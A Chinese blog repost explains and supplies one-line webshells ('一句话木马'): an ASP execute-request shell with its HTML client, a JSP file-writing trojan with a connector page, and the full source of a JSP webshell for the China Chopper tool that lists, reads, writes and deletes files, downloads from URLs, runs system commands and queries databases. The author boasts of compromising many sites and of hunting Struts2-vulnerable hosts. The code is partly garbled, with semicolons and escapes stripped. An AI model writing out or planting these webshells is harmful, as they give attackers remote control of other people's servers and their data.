一句话木马怎么用,原理是什么?

一句话木马怎么用,原理是什么?,第1张

句话木马就是在asp文件插入类似于这样的代码"<%execute request("nneeenn")%>"execute函数允许执行任意asp代码

在客户端写一个表单

<form action="你挂马的页面" method="post">

<input type="text" name="nneeenn" value=""><%--!此处的nneenn和<%execute request("nneeenn")%>中的nneeenn必须一致--%>

<input type="submit" value="发送">

</form>

把上面的代码保存成mm.html

打开

在里面输入你要执行的asp代码

点击发送

这时 你写的asp 代码就在远程执行了

而那个asp代码可以是个小木马

相信用过一句话木马的黑阔们对中国菜刀这个程序不会感到陌生,小弟也曾使用PHP一句话木马轻松lcx了很多站。近期Struts2重定向漏洞疯狂来袭,不少黑阔们都摩拳擦掌、争先恐后的寻找属于自己的那群“小肉鸡”。由于工作需要,我也对几个站点做了Struts2重定向漏洞的测试,所有使用Struts2框架的网站安全问题均不容乐观,中标率几乎达到了85%以上。也许一场血雨腥风的Struts2漏洞利用潮即将来临。说了这么多废话,本文的目的是什么呢?其实只是想记录一下JSP几种后门代码啦,因为曾经找JSP菜刀马找的老辛苦了。1、首先是JSP一句话木马和它的客户端小伙伴。(小伙伴们都惊呆了~~~)以下是服务端,保存成one.jsp并上传至目标服务器中。<%if(request.getParameter("f")!=null)(new java.io.FileOutputStream(application.getRealPath("")+request.getParameter("f"))).write(request.getParameter("t").getBytes())%>通过使用一句话木马客户端连接one.jsp木马。将下列代码保存为html页面:<html><head><title>JSP一句话木马客户端</title></head><div align=center> <font color=red>专用JSP木马连接器</font><br><form name=get method=post>服务端地址<input name=url size=110 type=text> <br><br><textarea name=t rows=20 cols=120>你提交的代码</textarea><br>保存成的文件名:<input name=f size=30 value=shell.jsp><input type=button onclick="javascript:get.action=document.get.url.valueget.submit()" value=提交></form> <br>服务端代码:<br><textarea rows=5 cols=120><%if(request.getParameter("f")!=null)(new java.io.FileOutputStream(application.getRealPath("\")+request.getParameter("f"))).write(request.getParameter("t").getBytes())%> </textarea> </div></body>保存完成后,打开html页面,写入一句话木马服务端地址,例如http://www.cto365.com/one.jsp,写入需要的代码和保存的文件名称点击保存即可。 2、中国菜刀能用的菜刀马本文除了对jsp一句话木马进行了说明,还提供了一个中国菜刀能用的菜刀马。将下列代码保存为xx.jsp并上传至目标服务器,使用中国菜刀工具进行连接。<%@page import="java.io.*,java.util.*,java.net.*,java.sql.*,java.text.*"%><%!String Pwd="cto365.com"String EC(String s,String c)throws Exception{return s}//new String(s.getBytes("ISO-8859-1"),c)}Connection GC(String s)throws Exception{String[] x=s.trim().split("rn")Class.forName(x[0].trim()).newInstance()Connection c=DriverManager.getConnection(x[1].trim())if(x.length>2){c.setCatalog(x[2].trim())}return c}void AA(StringBuffer sb)throws Exception{File r[]=File.listRoots()for(int i=0i<r.lengthi++){sb.append(r[i].toString().substring(0,2))}}void BB(String s,StringBuffer sb)throws Exception{File oF=new File(s),l[]=oF.listFiles()String sT, sQ,sF=""java.util.Date dtSimpleDateFormat fm=new SimpleDateFormat("yyyy-MM-dd HH:mm:ss")for(int i=0i<l.lengthi++){dt=new java.util.Date(l[i].lastModified())sT=fm.format(dt)sQ=l[i].canRead()?"R":""sQ+=l[i].canWrite()?" W":""if(l[i].isDirectory()){sb.append(l[i].getName()+"/t"+sT+"t"+l[i].length()+"t"+sQ+"n")}else{sF+=l[i].getName()+"t"+sT+"t"+l[i].length()+"t"+sQ+"n"}}sb.append(sF)}void EE(String s)throws Exception{File f=new File(s)if(f.isDirectory()){File x[]=f.listFiles()for(int k=0k<x.lengthk++){if(!x[k].delete()){EE(x[k].getPath())}}}f.delete()}void FF(String s,HttpServletResponse r)throws Exception{int nbyte[] b=new byte[512]r.reset()ServletOutputStream os=r.getOutputStream()BufferedInputStream is=new BufferedInputStream(new FileInputStream(s))os.write(("->"+"|").getBytes(),0,3)while((n=is.read(b,0,512))!=-1){os.write(b,0,n)}os.write(("|"+"<-").getBytes(),0,3)os.close()is.close()}void GG(String s, String d)throws Exception{String h="0123456789ABCDEF"int nFile f=new File(s)f.createNewFile()FileOutputStream os=new FileOutputStream(f)for(int i=0i<d.length()i+=2){os.write((h.indexOf(d.charAt(i))<<4|h.indexOf(d.charAt(i+1))))}os.close()}void HH(String s,String d)throws Exception{File sf=new File(s),df=new File(d)if(sf.isDirectory()){if(!df.exists()){df.mkdir()}File z[]=sf.listFiles()for(int j=0j<z.lengthj++){HH(s+"/"+z[j].getName(),d+"/"+z[j].getName())}}else{FileInputStream is=new FileInputStream(sf)FileOutputStream os=new FileOutputStream(df)int nbyte[] b=new byte[512]while((n=is.read(b,0,512))!=-1){os.write(b,0,n)}is.close()os.close()}}void II(String s,String d)throws Exception{File sf=new File(s),df=new File(d)sf.renameTo(df)}void JJ(String s)throws Exception{File f=new File(s)f.mkdir()}void KK(String s,String t)throws Exception{File f=new File(s)SimpleDateFormat fm=new SimpleDateFormat("yyyy-MM-dd HH:mm:ss")java.util.Date dt=fm.parse(t)f.setLastModified(dt.getTime())}void LL(String s, String d)throws Exception{URL u=new URL(s)int nFileOutputStream os=new FileOutputStream(d)HttpURLConnection h=(HttpURLConnection)u.openConnection()InputStream is=h.getInputStream()byte[] b=new byte[512]while((n=is.read(b,0,512))!=-1){os.write(b,0,n)}os.close()is.close()h.disconnect()}void MM(InputStream is, StringBuffer sb)throws Exception{String lBufferedReader br=new BufferedReader(new InputStreamReader(is))while((l=br.readLine())!=null){sb.append(l+"rn")}}void NN(String s,StringBuffer sb)throws Exception{Connection c=GC(s)ResultSet r=c.getMetaData().getCatalogs()while(r.next()){sb.append(r.getString(1)+"t")}r.close()c.close()}void OO(String s,StringBuffer sb)throws Exception{Connection c=GC(s)String[] t={"TABLE"}ResultSet r=c.getMetaData().getTables (null,null,"%",t)while(r.next()){sb.append(r.getString("TABLE_NAME")+"t")}r.close()c.close()}void PP(String s,StringBuffer sb)throws Exception{String[] x=s.trim().split("rn")Connection c=GC(s)Statement m=c.createStatement(1005,1007)ResultSet r=m.executeQuery("select * from "+x[3])ResultSetMetaData d=r.getMetaData()for(int i=1i<=d.getColumnCount()i++){sb.append(d.getColumnName(i)+" ("+d.getColumnTypeName(i)+")t")}r.close()m.close()c.close()}void QQ(String cs,String s,String q,StringBuffer sb)throws Exception{int iConnection c=GC(s)Statement m=c.createStatement(1005,1008)try{ResultSet r=m.executeQuery(q)ResultSetMetaData d=r.getMetaData()int n=d.getColumnCount()for(i=1i<=ni++){sb.append(d.getColumnName(i)+"t|t")}sb.append("rn")while(r.next()){for(i=1i<=ni++){sb.append(EC(r.getString(i),cs)+"t|t")}sb.append("rn")}r.close()}catch(Exception e){sb.append("Resultt|trn")try{m.executeUpdate(q)sb.append("Execute Successfully!t|trn")}catch(Exception ee){sb.append(ee.toString()+"t|trn")}}m.close()c.close()}%><%String cs=request.getParameter("z0")+""request.setCharacterEncoding(cs)response.setContentType("text/htmlcharset="+cs)String Z=EC(request.getParameter(Pwd)+"",cs)String z1=EC(request.getParameter("z1")+"",cs)String z2=EC(request.getParameter("z2")+"",cs)StringBuffer sb=new StringBuffer("")try{sb.append("->"+"|")if(Z.equals("A")){String s=new File(application.getRealPath(request.getRequestURI())).getParent()sb.append(s+"t")if(!s.substring(0,1).equals("/")){AA(sb)}}else if(Z.equals("B")){BB(z1,sb)}else if(Z.equals("C")){String l=""BufferedReader br=new BufferedReader(new InputStreamReader(new FileInputStream(new File(z1))))while((l=br.readLine())!=null){sb.append(l+"rn")}br.close()}else if(Z.equals("D")){BufferedWriter bw=new BufferedWriter(new OutputStreamWriter(new FileOutputStream(new File(z1))))bw.write(z2)bw.close()sb.append("1")}else if(Z.equals("E")){EE(z1)sb.append("1")}else if(Z.equals("F")){FF(z1,response)}else if(Z.equals("G")){GG(z1,z2)sb.append("1")}else if(Z.equals("H")){HH(z1,z2)sb.append("1")}else if(Z.equals("I")){II(z1,z2)sb.append("1")}else if(Z.equals("J")){JJ(z1)sb.append("1")}else if(Z.equals("K")){KK(z1,z2)sb.append("1")}else if(Z.equals("L")){LL(z1,z2)sb.append("1")}else if(Z.equals("M")){String[] c={z1.substring(2),z1.substring(0,2),z2}Process p=Runtime.getRuntime().exec(c)MM(p.getInputStream(),sb)MM(p.getErrorStream(),sb)}else if(Z.equals("N")){NN(z1,sb)}else if(Z.equals("O")){OO(z1,sb)}else if(Z.equals("P")){PP(z1,sb)}else if(Z.equals("Q")){QQ(cs,z1,z2,sb)}}catch(Exception e){sb.append("ERROR"+":// "+e.toString())}sb.append("|"+"<-")out.print(sb.toString())%>


欢迎分享,转载请注明来源:内存溢出

原文地址: http://outofmemory.cn/zaji/7300152.html

(0)
打赏 微信扫一扫 微信扫一扫 支付宝扫一扫 支付宝扫一扫
上一篇 2023-04-04
下一篇 2023-04-04

发表评论

登录后才能评论

评论列表(0条)

保存